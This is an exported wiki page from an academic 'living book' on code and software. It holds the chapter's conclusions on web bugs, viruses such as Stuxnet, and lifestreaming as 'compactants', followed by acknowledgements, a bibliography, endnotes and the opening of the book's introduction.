This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualised, usually through a graph or timeline, but there are also techniques, such as heat-maps and graph theory, that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and for the organisation (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but it also offers a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally constructs a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narrative, a stabilised web of meaning, for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software, and the implications for wider study in terms of the research and theorisation of computational society.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now lifestreaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software in order to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. At the same time, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways lifestreams - albeit lifestreams that have not been authorised by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: they are passive in quality - under the surface, relatively benign and silent - but aggressive in their hoarding of data, monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology, from the Latin for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. 
Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative context of a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), the present (as current data collection, or processed archival data), and the future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real - not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways it undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy; the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship, ref: 211106, which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organised by Caroline Bassett, University of Sussex; the Media Innovations Colloquium, organised by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for his kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book, which represents a neuronal frontal portrait of an individual; for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture Desire', ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4992</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4992"/>
		<updated>2012-06-21T11:04:12Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological, what I call ''computationality''. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
